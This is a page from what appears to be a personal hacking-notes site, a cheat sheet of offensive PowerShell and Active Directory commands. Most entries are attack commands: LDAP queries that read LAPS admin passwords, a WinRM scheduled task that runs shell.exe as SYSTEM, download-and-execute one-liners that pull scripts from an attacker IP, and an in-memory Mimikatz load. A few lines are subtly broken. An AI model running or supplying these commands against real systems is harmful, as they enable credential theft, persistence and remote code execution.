> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/misc/powershell/quick-commands.md).

# Quick Commands

#### LDAP Search

```powershell
ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```

#### Run Command as User (winrm):&#x20;

```powershell
$pw = ConvertTo-SecureString "PASSWD" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("USER", $pw)

Invoke-Command -Computer COMPUTER -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell.exe /ru SYSTEM } -Credential $creds
Invoke-Command -Computer COMPUTER-ScriptBlock { schtasks /run /tn shell } -Credential $creds
```

#### Download file:

```powershell
powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1)"
powershell -exec bypass -c IEX (iwr 'http://192.168.119.131/8888-198.ps1' -outfile 8888.ps1)
```

#### Download & Execute in memory:

```powershell
powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1, '.\8888-198.ps1')"
IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))
```

#### AD Users

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

#### Get Domain Machines / IPs

```powershell
Get-ADComputer -Credential $cred -Server DC.Example.com -Filter 'operatingsystem -like "*Windows*" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,OperatingSystemVersion,IPv4Address | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,OperatingSystemVersion,IPv4Address
```

**Powershell Grep Table**

```powershell
Get-ChildItem -Recurse | Select-String "password" -List | Select Path | Format-Table -AutoSize
```

**Powershell Grep**

```powershell
Get-ChildItem -Recurse | Select-String "password" -List | Select Path
```

**Get user groups**

```powershell
Get-ADPrincipalGroupMembership username | select name
```

**Merge all csv to one**

```powershell
Get-ChildItem -Filter *.csv | Select-Object -ExpandProperty FullName | Import-Csv | Export-Csv .\merged\merged.csv -NoTypeInformation -Append
```

**Get process using port**

```powershell
# TCP
Get-Process -Id (Get-NetTCPConnection -LocalPort 9095).OwningProcess
# UDP
Get-Process -Id (Get-NetUDPEndpoint -LocalPort 9095).OwningProcess
```
